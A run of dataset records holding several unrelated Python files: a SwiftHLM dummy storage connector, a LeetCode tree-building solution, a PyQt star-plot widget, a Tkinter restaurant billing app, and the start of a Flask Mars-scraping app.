name='hlm-connector',\n log_route='swifthlm', fmt=\"%(server)s: %(msecs)03d \"\n \"[%(filename)s:%(funcName)20s():%(lineno)s] %(message)s\")\n\n self.logger.info('info: Initialized Connector')\n self.logger.debug('dbg: Initialized Connector')\n #self.logger.info('conf: %s', self.conf)\n\n # Next method is to be invoked by SwiftHLM Handler using SwiftHLM Generic\n # Backend Interface (GBI) declared above in this file. It adapts SwiftHLM\n # request for an assumed dummy storage backend, mocks invoking the dummy\n # backend operations, reformats the backend response to GBI format, and\n # returns the response to SwitHLM handler\n def submit_request_get_response(self, request):\n self.__receive_request(request)\n self.__reformat_swifthlm_request_to_specific_backend_api()\n self.__submit_request_to_backend_get_response()\n self.__reformat_backend_response_to_generic_backend_api() \n return self.__response_out\n\n # This exemplary private method receives the request from SwiftHLM Handler \n def __receive_request(self, request):\n \n self.logger.debug('Receiving request from Handler')\n self.__request_in = request\n\n return\n \n # This exemplary private method reformats request to backend API\n # Some backends expect as input a file that lists the object data files to\n # be migrated or recalled. For this dummy backend connector it just copies\n # the incoming request\n def __reformat_swifthlm_request_to_specific_backend_api(self):\n\n self.logger.debug('Reformatting request to the specific Backend API')\n self.logger.debug('request_in: %s', self.__request_in)\n \n # Backend specific part, for the assumed dummy backend just copies the\n # incoming request\n self.__request_out = self.__request_in\n\n return\n\n # This exemplary method submits request to Backend and gets Response from\n # Backend. Currently the dummy backend is not implemented and object state\n # is not stored, instead response for migrate or recall is always 0\n # (success) and for STATE it is always 'resident' \n # TODO(Slavisa): Implement a somewhat improved dummy backend that simply\n # stores object state resident/premigrated/migrated, using filepath as the\n # database entiries key, into a simple database on file\n # SwiftHLM-Dummy-Backend.db stored under a configurable path (e.g.\n # /tmp/swifthlm for local and /cluster_fs/tmp/swifthlm for clustered file\n # backends\n\n def __submit_request_to_backend_get_response(self):\n \n self.logger.debug('Submitting request to backend')\n # migrate or recall\n if self.__request_out['request'] in {'migrate', 'recall'}:\n self.__response_in = 0 \n return\n # status\n objects_files_statuses = [] \n for object_file in self.__request_out['objects']: \n object_file_status = {}\n object_file_status['object'] = object_file['object']\n object_file_status['file'] = object_file['file']\n object_file_status['status'] = 'resident'\n objects_files_statuses.append(object_file_status)\n self.__response_in['objects'] = objects_files_statuses\n #self.__response_in = self.__request_out\n\n return\n\n def __reformat_backend_response_to_generic_backend_api(self):\n\n self.logger.debug('Reformatting response to Generic Backend API')\n self.logger.debug('response_in: %s', self.__response_in)\n \n # Backend specific part, for the assumed dummy backend it just copies the\n # incoming response from the backend\n self.__response_out = self.__response_in\n\n return\n\nif __name__ == '__main__':\n # SwiftHlmConnector class is not assumed to be used standalone, instead it\n # is imported for a configured backend by SwiftHLM Handler and invoked from\n # the Handler. Alternatively it could be modified to be invoked as a new\n # process and/or remotely similar to SwiftHLM Dispatcher invoking SwiftHLM\n # Handler\n raise \n\n","sub_path":"swifthlm/dummy_connector.py","file_name":"dummy_connector.py","file_ext":"py","file_size_in_byte":8700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"574486121","text":"#\n# @lc app=leetcode.cn id=106 lang=python3\n#\n# [106] 从中序与后序遍历序列构造二叉树\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def buildTree(self, inorder: List[int], postorder: List[int]) -> TreeNode:\n # postOrder: 左-右-根\n # 关键:通过inorder确定左右子树的长度\n inorder_mem = {v:i for i,v in enumerate(inorder)}\n\n def traverse(postorder, in_begin, in_end):\n if not postorder: return None\n root = postorder[-1]\n in_idx = inorder_mem[root]\n # 以下4句是最容易出错的地方\n left_len = in_idx - in_begin\n right_len = in_end - in_begin - left_len\n node = TreeNode(root)\n node.right = traverse(postorder[-1-right_len:-1], in_idx+1, in_end)\n node.left = traverse(postorder[:-1-right_len], in_begin, in_idx-1)\n return node\n\n return traverse(postorder, 0, len(postorder)-1)\n\n\n\n# @lc code=end\n\n","sub_path":"Week_02/106_从中序与后序遍历序列构造二叉树.py","file_name":"106_从中序与后序遍历序列构造二叉树.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"67587032","text":"\nfrom PyQt5.QtGui import QPainter, QColor, QTransform, QFont, QPen, QCursor, QVector2D, QFontMetrics\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom vis.VisWidget import VisWidget\nfrom data import Relation\nimport math\n\n\nclass StarPlot(VisWidget):\n \"\"\"\n Radial star plot with multiple axes.\n \"\"\"\n\n canvasAreaChanged = pyqtSignal()\n axisChanged = pyqtSignal()\n selectionChanged = pyqtSignal()\n\n def __init__(self):\n super().__init__()\n\n self.__bgColor = QColor(255, 255, 255)\n self.scene().setBackgroundBrush(self.__bgColor)\n\n self.labelFont = QFont('Decorative', 8)\n\n self.class1Color = Qt.red\n self.class2Color = Qt.blue\n self.class1Pen = QPen(self.class1Color)\n self.class2Pen = QPen(self.class2Color)\n\n self.axes = []\n self.axisAngles = []\n self.axisLabels = []\n self.lineGroups = []\n\n self.highlightedItems = set()\n self.highlightedRings = set()\n self.activeClasses = set()\n\n # timer for delayed plot update on resize events\n self.resizeUpdateDelay = 150\n self.__resizeDelayTimer = QTimer(self)\n self.__resizeDelayTimer.timeout.connect(self.canvasAreaChanged.emit)\n\n self.selectionUpdateDelay = 200\n self.__selectionUpdateTimer = QTimer(self)\n self.__selectionUpdateTimer.timeout.connect(self.selectionChanged.emit)\n\n self.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n self.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n\n self.setDragMode(QGraphicsView.RubberBandDrag)\n\n self.rubberBandChanged.connect(self.selectData)\n self.setCacheMode(QGraphicsView.CacheBackground)\n\n self.colorDialog = QColorDialog()\n\n @property\n def bgColor(self):\n \"\"\"Get the background color.\n \"\"\"\n return self.__bgColor\n\n @bgColor.setter\n def bgColor(self, color):\n \"\"\"Set the bg color.\n \"\"\"\n self.__bgColor = color\n self.scene().setBackgroundBrush(self.__bgColor)\n\n def getClassColor(self, cls):\n if self.plotPalette is None or cls not in self.plotPalette:\n return QColor()\n\n return self.plotPalette[cls]\n\n def setRelation(self, rel: Relation):\n super().setRelation(rel)\n self.activeClasses = self.relation.activeClasses\n\n def updateWidget(self):\n self.setUpdatesEnabled(False)\n\n if self.relation is None:\n return\n\n # save axis rotations, but only if we don't have a new dataset with a different number of axes\n self.axisAngles.clear()\n if len(self.axes) == len(self.relation.fieldNames) - 1:\n for a in self.axes:\n self.axisAngles.append(a.rotation())\n\n self.lineGroups.clear()\n self.highlightedItems.clear()\n self.highlightedRings.clear()\n self.axisLabels.clear()\n self.axes.clear()\n self.scene().clear()\n\n self.addAxes()\n self.addPoints()\n\n if self.axisAngles:\n self.reparentLines()\n\n self.setUpdatesEnabled(False)\n\n def addAxes(self):\n \"\"\"Add a new axis to the graph.\n \"\"\"\n numDims = len(self.relation.fieldNames) - 1\n angle = 360 / numDims\n axisDomains = self.relation.axisDomains\n for i in range(numDims):\n axis = PlotAxis(self)\n self.scene().addItem(axis)\n if self.axisAngles and i < len(self.axisAngles):\n axis.setRotation(self.axisAngles[i])\n else:\n axis.setRotation(angle * i)\n self.axes.append(axis)\n\n domain = axisDomains[i]\n text = PlotAxisLabel(\"{}\\n[{:.2f},{:.2f}]\".format(self.relation.fieldNames[i], domain[0], domain[1]))\n text.setFont(self.labelFont)\n self.axisLabels.append(text)\n text.setParentItem(axis)\n\n def addPoints(self):\n \"\"\"Add a number of points to the graph.\n \"\"\"\n numDims = len(self.relation.fieldNames) - 1\n datasets = self.relation.getScaledDatasets()\n for ds in datasets:\n points = []\n lines = []\n for i in range(numDims):\n p = PlotPoint(self, ds[i], ds[-1])\n p.setParentItem(self.axes[i])\n points.append(p)\n\n if 0 < i:\n lines.append(PlotLine(self, points[i - 1], p))\n if i == numDims - 1:\n lines.append(PlotLine(self, p, points[0]))\n\n group = self.scene().createItemGroup(lines)\n group.dataClassLabel = points[0].cls\n self.lineGroups.append(group)\n\n def reparentLines(self):\n for lg in self.lineGroups:\n lines = lg.childItems()\n lines = list(sorted(lines, key=lambda x: x.p1.parentItem().rotation()))\n\n numDims = len(lines)\n for i, l in enumerate(lines):\n l.p2 = lines[i + 1 if i + 1 < numDims else 0].p1\n\n def filterClasses(self, classes):\n \"\"\"\n Filter classes without reloading the dataset.\n L{StarPlot.activeClasses} contains all currently active classes.\n\n @param classes class names to filter by\n \"\"\"\n items = self.scene().items()\n for i in items:\n if type(i) == PlotLine or type(i) == PlotPoint:\n i.setVisible(i.cls in classes)\n\n self.activeClasses = classes\n\n def mouseDoubleClickEvent(self, event):\n self.colorDialog.setCurrentColor(self.bgColor)\n self.colorDialog.open(self._setBackgroundColor)\n\n def _setBackgroundColor(self):\n self.bgColor = self.sender().currentColor()\n\n def resizeEvent(self, event):\n self.setUpdatesEnabled(False)\n super().resizeEvent(event)\n # center scene in viewport\n r = self.rect()\n t = QTransform()\n t.translate(-r.width() / 2, -r.height() / 2)\n r = QRectF(QPointF(r.x(), r.y()) * t, QSizeF(r.width(), r.height()))\n self.setSceneRect(r)\n self.__resizeDelayTimer.start(self.resizeUpdateDelay)\n self.setUpdatesEnabled(True)\n\n def selectData(self, rubberBandRect, fromScenePoint, toScenePoint):\n \"\"\"Use the coordinates to color the selected part of the graph. \n \"\"\"\n if fromScenePoint == toScenePoint:\n return\n\n if QApplication.keyboardModifiers() != Qt.ShiftModifier and QApplication.keyboardModifiers() != Qt.ControlModifier:\n # unselect all currently selected items\n for h in self.highlightedItems:\n h.highlighted = False\n self.highlightedItems.clear()\n self.highlightedRings.clear()\n\n sel = self.items(rubberBandRect)\n for s in sel:\n if type(s) == PlotLine:\n parent = s.parentItem()\n siblings = parent.childItems()\n\n if QApplication.keyboardModifiers() == Qt.ControlModifier:\n for sib in siblings:\n if sib in self.highlightedItems:\n sib.highlighted = False\n self.highlightedItems.remove(sib)\n if parent in self.highlightedRings:\n self.highlightedRings.remove(parent)\n else:\n for sib in siblings:\n sib.highlighted = True\n self.highlightedItems.add(sib)\n self.highlightedRings.add(parent)\n\n self.__selectionUpdateTimer.start(self.selectionUpdateDelay)\n\n def sizeHint(self):\n return QSize(1000, 1000)\n\n def minimumSizeHint(self):\n return QSize(400, 400)\n\n\nclass PlotAxis(QGraphicsObject):\n ItemAxisLenHasChanged = 0x9901\n\n def __init__(self, view):\n super().__init__()\n self.view = view\n\n self.p1 = QPoint(0, 0)\n self.p2 = QPoint(0, 0)\n\n self.paddingHoriz = 30\n self.paddingVert = 60 + QFontMetrics(self.view.labelFont).height() * 2\n self.__canvasW = view.rect().size().width() - self.paddingHoriz\n self.__canvasH = view.rect().size().height() - self.paddingVert\n\n self.axesColor = QColor(150, 150, 150)\n self.axesWidth = 1\n self.axesWidthHighl = 3\n self.axisGrabbed = False\n self.axesPen = QPen(self.axesColor, self.axesWidth)\n\n self.setAcceptHoverEvents(True)\n self.setAcceptDrops(True)\n self.setFlag(QGraphicsItem.ItemSendsGeometryChanges, True)\n\n self.__canvasMaxDim = 0\n self.__boundingRect = None\n\n # save original rotation during axis reordering\n self.__origRotation = self.rotation()\n self.__dragActive = False\n\n self.axisAnimation = QPropertyAnimation(self, b\"relativeRotation\")\n self.axisAnimation.setDuration(600)\n self.axisAnimation.setEasingCurve(QEasingCurve.InOutQuad)\n self.__relRotationStartValue = 0\n\n self.view.canvasAreaChanged.connect(self.updateCanvasGeometry)\n\n def initRelativeRotation(self):\n \"\"\"\n When animating rotation using the L{relativeRotation}, call this method before\n starting the animation. Otherwise relative angles will be added up resulting in a much\n larger rotation than intended.\n \"\"\"\n self.__relRotationStartValue = self.rotation()\n\n @pyqtProperty(float)\n def relativeRotation(self):\n \"\"\"\n Q_PROPERTY for animating relative rotations. Fix the initial rotation first using\n L{initRelativeRotation()} before starting the animation.\n\n @return: current rotation\n \"\"\"\n return self.rotation()\n\n @relativeRotation.setter\n def relativeRotation(self, rot):\n \"\"\"\n Q_PROPERTY for animating relative rotations. Fix the initial rotation first using\n L{initRelativeRotation()} before starting the animation.\n \"\"\"\n self.setRotation((self.__relRotationStartValue + rot) % 360)\n\n def hoverEnterEvent(self, event):\n self.axesPen.setWidth(self.axesWidthHighl)\n self.setCursor(Qt.PointingHandCursor)\n self.update()\n\n def hoverLeaveEvent(self, event):\n self.axesPen.setWidth(self.axesWidth)\n self.setCursor(Qt.ArrowCursor)\n self.update()\n\n def mousePressEvent(self, event):\n self.axisGrabbed = True\n self.setCursor(Qt.ClosedHandCursor)\n\n if not self.__dragActive:\n self.__origRotation = self.rotation()\n self.__dragActive = True\n\n def mouseMoveEvent(self, event):\n if self.__dragActive:\n mousePos = self.view.mapToScene(self.view.mapFromGlobal(QCursor.pos()))\n vec1 = QVector2D(mousePos)\n vec1.normalize()\n trans = QTransform()\n trans.rotate(self.rotation())\n vec2 = QVector2D(self.p2 * trans)\n vec2.normalize()\n angle = math.acos(max(-1, min(1, QVector2D.dotProduct(vec1, vec2)))) * 180 / math.pi\n\n # clockwise rotation\n if vec1.y() * vec2.x() < vec1.x() * vec2.y():\n angle *= -1\n\n angle = (self.rotation() + angle) % 360\n self.setRotation(angle)\n\n def mouseReleaseEvent(self, event):\n self.axisGrabbed = False\n self.setCursor(Qt.PointingHandCursor)\n\n if self.__dragActive:\n relRotation = (self.rotation() - self.__origRotation) % 360\n clockwise = (relRotation <= 180)\n angleModifier = 360 - self.__origRotation\n relOwnAngle = (self.rotation() + angleModifier) % 360\n angleDiff = 360 / len(self.view.axes)\n numSteps = 0\n for a in self.view.axes:\n if a == self:\n continue\n\n r = a.rotation()\n relAngle = (r + angleModifier) % 360\n if clockwise and relAngle - relOwnAngle < 0:\n a.axisAnimation.setStartValue(0)\n a.axisAnimation.setEndValue(-angleDiff)\n a.initRelativeRotation()\n a.axisAnimation.start()\n numSteps += 1\n elif not clockwise and relAngle - relOwnAngle > 0:\n a.axisAnimation.setStartValue(0)\n a.axisAnimation.setEndValue(angleDiff)\n a.initRelativeRotation()\n a.axisAnimation.start()\n numSteps -= 1\n\n newRot = (self.__origRotation + (numSteps * angleDiff)) % 360\n relRotation = newRot - self.rotation()\n # make sure we don't rotate a full circle when crossing 0°\n if relRotation < -180:\n relRotation %= 360\n\n self.axisAnimation.setStartValue(0)\n self.axisAnimation.setEndValue(relRotation)\n self.initRelativeRotation()\n self.axisAnimation.start()\n self.__origRotation = newRot\n\n # redraw all lines between points of neighboring axes\n self.view.reparentLines()\n self.__dragActive = False\n\n def updateCanvasGeometry(self):\n self.view.setUpdatesEnabled(False)\n self.__canvasW = self.view.rect().size().width() - self.paddingHoriz\n self.__canvasH = self.view.rect().size().height() - self.paddingVert\n self.__canvasMaxDim = min(self.__canvasW, self.__canvasH)\n lw = max(self.axesWidth, self.axesWidthHighl) / 2 + 4\n self.__boundingRect = QRectF(QPoint(0 - lw, 0 - lw), QPoint(self.__canvasMaxDim / 2 + lw, lw))\n self.itemChange(self.ItemAxisLenHasChanged, None)\n self.view.setUpdatesEnabled(True)\n\n def itemChange(self, change, variant):\n if change == self.ItemAxisLenHasChanged or \\\n (change == QGraphicsItem.ItemRotationHasChanged and self.view.relation.numDatasets < 200):\n self.view.axisChanged.emit()\n return super().itemChange(change, variant)\n\n def paint(self, qp: QPainter, option: QStyleOptionGraphicsItem, widget: QWidget=None):\n qp.setPen(self.axesPen)\n self.p2 = QPoint(min(self.__canvasW, self.__canvasH) / 2, 0)\n qp.drawLine(self.p1, self.p2)\n\n def boundingRect(self):\n if self.__boundingRect is None:\n self.updateCanvasGeometry()\n return self.__boundingRect\n\n\nclass PlotAxisLabel(QGraphicsTextItem):\n def __init__(self, text):\n super().__init__(text)\n self.setFlag(QGraphicsItem.ItemSendsGeometryChanges, True)\n\n def paint(self, qp: QPainter, option: QStyleOptionGraphicsItem, widget: QWidget=None):\n p = self.parentItem()\n pRot = p.rotation()\n trans = QTransform()\n trans.rotate(-p.rotation())\n\n p2Scene = p.mapToScene(p.p2)\n if 0 <= pRot < 90:\n trans.translate(p2Scene.x() - self.boundingRect().width(), p2Scene.y())\n elif 90 <= pRot < 180:\n trans.translate(p2Scene.x(), p2Scene.y())\n elif 180 <= pRot < 270:\n trans.translate(p2Scene.x(), p2Scene.y() - self.boundingRect().height())\n elif 270 <= 360:\n trans.translate(p2Scene.x() - self.boundingRect().width(), p2Scene.y() - self.boundingRect().height())\n self.setTransform(trans)\n\n super().paint(qp, option, widget)\n\n\nclass PlotPoint(QGraphicsItem):\n def __init__(self, view, val, cls):\n super().__init__()\n self.val = val\n self.cls = cls\n self.view = view\n\n self.__axisLen = 0\n self.__boundingRect = None\n\n self._pen = None\n\n self.updateColor()\n view.plotPaletteChanged.connect(self.updateColor)\n view.axisChanged.connect(self.updateAxisLen)\n\n def updateColor(self):\n self._pen = QPen(self.view.getClassColor(self.cls))\n\n def updateAxisLen(self):\n self.__axisLen = self.parentItem().boundingRect().width()\n self.__boundingRect = QRectF(QPoint(self.val * self.__axisLen - 2, -2), QPoint(self.val * self.__axisLen + 2, 2))\n\n def paint(self, qp: QPainter, option: QStyleOptionGraphicsItem, widget: QWidget = None):\n qp.setPen(self._pen)\n qp.drawRect(self.boundingRect())\n\n def boundingRect(self):\n if self.__boundingRect is None:\n self.updateAxisLen()\n return self.__boundingRect\n\n\nclass PlotLine(QGraphicsLineItem):\n def __init__(self, view, p1, p2):\n super().__init__()\n self.p1 = p1\n self.p2 = p2\n self.cls = p1.cls\n self.view = view\n self.highlighted = False\n self.lineWidth = 1\n self.lineWidthHighl = 4\n self._pen = None\n self._penHighl = None\n\n self.updateColor()\n self.updateLine()\n view.plotPaletteChanged.connect(self.updateColor)\n view.axisChanged.connect(self.updateLine)\n\n def updateColor(self):\n color = self.view.getClassColor(self.cls)\n self._pen = QPen(color)\n self._pen.setWidth(self.lineWidth)\n colorHighl = QColor(color)\n colorHighl.setAlpha(255)\n self._penHighl = QPen(colorHighl)\n self._penHighl.setWidth(self.lineWidthHighl)\n\n def updateLine(self):\n p1 = self.p1.mapToScene(self.p1.boundingRect().center())\n p2 = self.p2.mapToScene(self.p2.boundingRect().center())\n self.setLine(QLineF(p1, p2))\n\n def paint(self, qp: QPainter, option: QStyleOptionGraphicsItem, widget: QWidget = None):\n self.setPen(self._pen if not self.highlighted else self._penHighl)\n super().paint(qp, option, widget)\n\n","sub_path":"QtWekaWrapper/vis/StarPlot.py","file_name":"StarPlot.py","file_ext":"py","file_size_in_byte":17499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"630630146","text":"import tkinter\r\nimport sqlite3\r\nfrom tkinter import *\r\nimport time\r\nimport random\r\nfrom PIL import Image,ImageTk\r\n\r\n\r\nroot=Tk()\r\nroot.geometry(\"1500x500\")\r\n#table=sqlite3.connect(\"restaurant1.db\")\r\n#table.execute('''CREATE TABLE ORDERS\r\n#(ORDER_NUMBER INT PRIMARY KEY NOT NULL,FRIES_MEAL INT,LUNCH_MEAL INT,BURGER_MEAL INT,PIZZA_MEAL INT,CHEESE_BURGER INT,DRINKS INT,COST INT,SERVICE_CHARGE FLOAT,TAX FLOAT,SUBTOTAL FLOAT,TOTAL FLOAT);''')\r\n#table.commit()\r\n\r\ndef price():\r\n master = Tk()\r\n master.geometry(\"550x650\")\r\n f1 = Frame(master)\r\n f1.pack(side=TOP)\r\n x = Label(f1, text=\"PRICE LIST\\n\",font=(\"comic sans ms\",\"20\",\"underline\",\"bold\"),fg=\"steel blue\")\r\n x.pack()\r\n\r\n f2 = Frame(master)\r\n f2.pack(side=LEFT)\r\n a1 = Label(f2, text=\"ITEMS\\n\",font=(\"comic sans ms\",\"15\",\"underline\"),fg=\"steel blue\")\r\n a1.pack()\r\n a = Label(f2, text=\"FRIES MEAL\\n\\nLUNCH MEAL\\n\\nBURGER MEAL\\n\\nPIZZA MEAL\\n\\nCHESSE BURGER\\n\\nDRINKS\\n\\nMEAL 1-\\nFRIES MEAL+BURGER MEAL+DRINKS\\n\\nMEAL 2-\\nPIZZA MEAL+CHESSE BURGER+DRINKS\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\n a.pack()\r\n\r\n f3 = Frame(master)\r\n f3.pack(side=RIGHT)\r\n b1 = Label(f3, text=\"PRICE\\n\",font=(\"comic sans ms\",\"15\",\"underline\"),fg=\"steel blue\")\r\n b1.pack()\r\n b = Label(f3, text=\"Rs 100\\n\\nRs 230\\n\\nRs 155\\n\\nRs 440\\n\\nRs 150\\n\\nRs 50\\n\\n\\nRs 250\\n\\n\\nRs 500\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\n b.pack()\r\n\r\n master.mainloop()\r\n\r\nclass Calculate:\r\n def price(self,e2,e3,e4,e5,e6,e7,m1,m2):\r\n a = e2.get()\r\n b = e3.get()\r\n c = e4.get()\r\n d = e5.get()\r\n e = e6.get()\r\n f = e7.get()\r\n g = m1.get()\r\n h = m2.get()\r\n costofmeal = str(int(a) * 100 + int(b) * 230 + int(c) * 155 + int(d) * 440 + int(e) * 150 + int(f) * 50 + int(g) * 250 + int(h) *500)\r\n charge = str((int(a) * 100 + int(b) * 230 + int(c) * 155 + int(d) * 440 + int(e) * 150 + int(f) * 50 + int(g) * 250 + int(h) *500) / 99)\r\n pay = str((int(a) * 100 + int(b) * 230 + int(c) * 155 + int(d) * 440 + int(e) * 150 + int(f) * 50 + int(g) * 250 + int(h) *500) * 0.10)\r\n tt = str(float(costofmeal) + float(charge) + float(pay))\r\n cost.set(costofmeal)\r\n service.set(charge)\r\n tax.set(pay)\r\n final.set(tt)\r\n\r\ndef amount():\r\n c=Calculate()\r\n c.price(e2,e3,e4,e5,e6,e7,m1,m2)\r\n\r\n\r\nran=StringVar()\r\ncost=StringVar()\r\nservice=StringVar()\r\ntax=StringVar()\r\nfinal=StringVar()\r\n\r\n\r\nx=random.randint(1,500)\r\norder=str(x)\r\nran.set(order)\r\n\r\n\r\n\r\ndef reset():\r\n e2.delete(0,END)\r\n e3.delete(0,END)\r\n e4.delete(0,END)\r\n e5.delete(0,END)\r\n e6.delete(0,END)\r\n e7.delete(0,END)\r\n m1.delete(0, END)\r\n m2.delete(0, END)\r\n cost.set(\"\")\r\n service.set(\"\")\r\n tax.set(\"\")\r\n final.set(\"\")\r\n\r\n#****************************************************************\r\n\r\n\r\nframe1=Frame(root)\r\nframe1.pack(side=TOP)\r\nx=Label(frame1,text=\"RESTAURANT MANAGEMENT SYSTEM\",font=(\"comic sans ms\",'30',\"bold\",\"underline\"),fg=\"steel blue\",bd=10,anchor=W)\r\nx.grid(row=0,column=0)\r\n\r\nlocaltime=time.asctime(time.localtime(time.time()))\r\ntime=Label(frame1,text=localtime,font=(\"comic sans ms\",\"20\",\"bold\",\"italic\"),fg=\"steel blue\",anchor=W)\r\ntime.grid(row=1,column=0)\r\n#-----------------------------------------\r\n\r\nframe2=Frame(root)\r\nframe2.pack(side=LEFT)\r\n\r\nlbl1=Label(frame2,text=\"Order No.\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl1.grid(row=0)\r\ne1=Entry(frame2,text=\"Order No.\",textvariable=ran,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\ne1.grid(row=0,column=1)\r\n\r\nlbl2=Label(frame2,text=\"Fries Meal\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl2.grid(row=1)\r\ne2=Entry(frame2,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\ne2.grid(row=1,column=1)\r\n\r\nlbl3=Label(frame2,text=\"Lunch Meal\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl3.grid(row=2)\r\ne3=Entry(frame2,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\ne3.grid(row=2,column=1)\r\n\r\nlbl4=Label(frame2,text=\"Burger Meal\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl4.grid(row=3)\r\ne4=Entry(frame2,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\ne4.grid(row=3,column=1)\r\n\r\nlbl5=Label(frame2,text=\"Pizza Meal\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl5.grid(row=4)\r\ne5=Entry(frame2,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\ne5.grid(row=4,column=1)\r\n\r\nlbl6=Label(frame2,text=\"Cheese Burger\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl6.grid(row=5)\r\ne6=Entry(frame2,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\ne6.grid(row=5,column=1)\r\n\r\nmeal1=Label(frame2,text=\"Meal 1\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nmeal1.grid(row=6)\r\nm1=Entry(frame2,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nm1.grid(row=6,column=1)\r\n#------------------------------------\r\n\r\nframe3=Frame(root)\r\nframe3.pack(side=RIGHT)\r\n\r\nmeal2=Label(frame3,text=\"Meal 2\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nmeal2.grid(row=0)\r\nm2=Entry(frame3,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nm2.grid(row=0,column=1)\r\n\r\nlbl7=Label(frame3,text=\"Drinks\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl7.grid(row=1)\r\ne7=Entry(frame3,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\ne7.grid(row=1,column=1)\r\n\r\nlbl8=Label(frame3,text=\"Cost\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl8.grid(row=2)\r\ne8=Entry(frame3,textvariable=cost,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\ne8.grid(row=2,column=1)\r\n\r\nlbl9=Label(frame3,text=\"Service Charge\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl9.grid(row=3)\r\ne9=Entry(frame3,textvariable=service,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\ne9.grid(row=3,column=1)\r\n\r\nlbl10=Label(frame3,text=\"Tax\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl10.grid(row=4)\r\ne10=Entry(frame3,textvariable=tax,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\ne10.grid(row=4,column=1)\r\n\r\nlbl11=Label(frame3,text=\"Subtotal\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl11.grid(row=5)\r\ne11=Entry(frame3,textvariable=cost,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\ne11.grid(row=5,column=1)\r\n\r\nlbl12=Label(frame3,text=\"Total\",font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\nlbl12.grid(row=6)\r\ne12=Entry(frame3,textvariable=final,font=(\"comic sans ms\",\"15\"),fg=\"steel blue\")\r\ne12.grid(row=6,column=1)\r\n\r\n\r\n#sheet.write()\r\n# table.execute(\"INSERT INTO ORDERS VALUES({},{},{},{},{},{},{},{},{},{},{},{})\".format(e1,e2,e3,e4,e5,e6,e7,e8,e9,e10,e11,e12))\r\n# table.commit()\r\n\r\n#---------------------------------\r\n\r\nframe4=Frame(root)\r\nframe4.pack(side=BOTTOM)\r\nprice=Button(frame4,text=\"price\",height=3,width=10,font=(\"comic sans ms\",\"11\"),fg=\"steel blue\",command=price)\r\nprice.grid(row=0,column=0,padx=10,pady=10)\r\ntotal=Button(frame4,text=\"total\",height=3,width=10,font=(\"comic sans ms\",\"11\"),fg=\"steel blue\",command=amount)\r\ntotal.grid(row=0,column=5,padx=10,pady=10)\r\nreset=Button(frame4,text=\"reset\",height=3,width=10,font=(\"comic sans ms\",\"11\"),fg=\"steel blue\",command=reset)\r\nreset.grid(row=0,column=10,padx=10,pady=10)\r\nexit=Button(frame4,text=\"exit\",height=3,width=10,font=(\"comic sans ms\",\"11\"),fg=\"steel blue\",command=root.quit)\r\nexit.grid(row=0,column=15,padx=10,pady=10)\r\n\r\n#--------------------------------------------------------\r\n\r\nmainloop()\r\n","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":7144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"200604080","text":"# import necessary libraries\r\nfrom flask import Flask, render_template, redirect\r\nfrom flask_pymongo import PyMongo\r\nimport scrape_mars\r\nimport os\r\n\r\n\r\n# create instance of Flask app\r\napp = Flask(__name__)\r\n\r\napp.config[\"MONGO_URI\"] = \"mongodb://localhost:27017/mars_db\"\r\nmongo = PyMongo(app)\r\n\r\n#initialize MongoDB\r\n\r\n# Create route that renders index.html template and finds documents from mongo\r\n\r\n# Create route that renders index.html template and finds documents from mongo\r\n@app.route(\"/\")\r\ndef home(): \r\n\r\n # Find data\r\n mars_info = mongo.db.mars_collection.find_one()\r\n\r\n # Return template and data\r\n return render_template(\"index.html\", mars_info=mars_info)\r\n\r\n# Route that will trigger scrape function\r\n@app.route(\"/scrape\")\r\ndef scrape(): \r\n\r\n # Run scrapped functions\r\n mars_info = scrape_mars.scrape_mars_news()\r\n mars_info = scrape_mars.scrape_mars_image()\r\n mars_info = scrape_mars.scrape_mars_facts()\r\n mars_info = scrape_mars.scrape_mars_weather()\r\n mars_info = scrape_mars.scrape_mars_hemispheres()\r\n mongo.db.mars_collection.update({}, mars_info, upsert=True)\r\n\r\n return 